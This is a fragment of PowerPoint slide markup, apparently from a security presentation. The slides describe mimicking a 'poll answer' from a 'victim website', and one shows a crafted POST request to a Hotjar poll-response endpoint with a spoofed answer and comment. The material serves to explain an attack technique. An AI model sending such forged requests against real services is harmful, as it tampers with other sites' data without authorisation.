              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mimic the “poll answer” from the victim website</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" b="0" dirty="0">
              <a:effectLst/>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70C8FF5D-3F10-51DD-4132-694D6072B55E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="35836" t="25444"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5170149" y="640080"/>
            <a:ext cx="5872013" cy="5577840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3020884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812F08-718D-903E-4721-9FC7989FEB61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="151179"/>
            <a:ext cx="10363199" cy="6555641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/client/sites/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2421914</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/poll/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>423135</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/response/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>85</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-4963-92e2-00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>481</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>98</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: ask.hotjar.io</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>utk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response_content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"{</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version</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:4,</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answers</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>questionUuid</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78942292</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answer</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Something else</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comment</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sparta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}]}"</a:t>
            </a:r>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>questions_seen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"78941292-cbe6-4667-a902-2134d323bc33"</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    ],</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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>first_seen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>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"action"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>create_or_update_poll_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window_width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>522</a:t>
            </a:r>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window_height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>488</a:t>
            </a:r>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"1849442f-f692-5bec-b396-1bf1ac798a3e"</a:t>
            </a:r>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"https://mydomain.com/poll.html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>identify_user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
